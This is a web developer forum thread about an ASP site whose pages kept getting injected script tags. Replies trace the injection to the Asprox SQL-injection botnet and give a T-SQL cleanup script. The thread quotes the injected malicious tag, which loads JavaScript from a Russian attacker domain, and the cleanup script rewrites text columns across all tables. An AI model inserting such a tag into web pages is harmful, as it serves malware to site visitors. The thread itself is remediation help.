0

Sir
I have created one website When i hosted in server automatically adds malware,
when viewing source code following lines are automatically added

<script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script>

How to get out of this malware line from my website.If i remove those lines and upload also again those line are added automatically how to solve this problem ?? how this line are added automatically ??

Kindly help on above issue

7
Contributors
20
Replies
21
Views
9 Years
Discussion Span
Last Post by omol
0

Ask your server host to change that (unlikely) or get a new one. That's the only way, probably.

0

Yeah, report this to your host. If they want your business, they'll get it fixed. Else, start shopping for another host. Meanwhile, backup your site and make sure that none of the mess gets carried over.

0

What you using PHP/ASP/or just simple HTML? Was this JavaScript added to your records in database or just to your pages?

0

What you using PHP/ASP/or just simple HTML? Was this JavaScript added to your records in database or just to your pages?

We are using HTML and ASP, these lines are add in web page not in DB.

0

What is your host? Also, are you uploading the files directly, but it's still getting put in. Or are you, say, putting the text into a built-in text editor there, and then it's put in?

0

The host is adding them to display advertising. That's how you get free web hosting.

Not in this case, this know problem with some guys injecting JavaScript either into database, or part of web page usually through feed. If you actually care to copy & paste link to the site into your browser and try to access it, you get warning from google that site contains nasties...

0

(<script src=http://www.uhwc.ru/js.js></script>)

Hi,
I have had the same problem and was even tagged by Google.

The only way to do it is open your entire web site (I mean all of the files) in whatever software you use, do a search and replace. Change all of your passwords (Server, database, email, etc ...).

Mine has not come back since.

My problem started around Mid August 2008 ... Is Godaddy you hosting company by any chance?

0

You have a form on your website that has been exploited. It's part of a very big botnet that automatically finds vunribiltys for asp and injects source into one of your fields. Fix the problem with correct error checking and then edit your database and remove the javascript links.

If you want to find out more infomation about this botnet it's been given the alias asprox.

0

I am looking into it right now. I thought my problem was over with. This is scary. I have had inconsistent behavior from MySQL and your input might help me pint point the issue. Thank you.

0

Hi Omol,

Since you asked ... I have been looking into my db (not very good at it though) ... what exactly am I looking for? In the web pages, it was easy to find the intrusive url and delete. What do I search for? I tried asprox, ect ... nothing found.

Thank you.

Rachel

0

Yes, MySQL. I looked for js.js. in db, not there.

I did remove js.js from the website pages a while back. I checked again, it has not come back.

Something is making my database inconsistent ... Users able to register a new listing one minute but not the other (while the database is still taking their info but not publishing it back to the site).

0

Sorry i should not edit posts.

Heres the fix. Replace infected_table with the table name that is infected on your site.

use <infected_table>
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 –
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+'])))
)
where ['+@C+'] like ''%<script%</script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

If you need to know more, or want more infomation have a look at.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf

0

One thing, your going to have to clean up your code and get some validation in place etc. Again if you need help with this let me know.

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.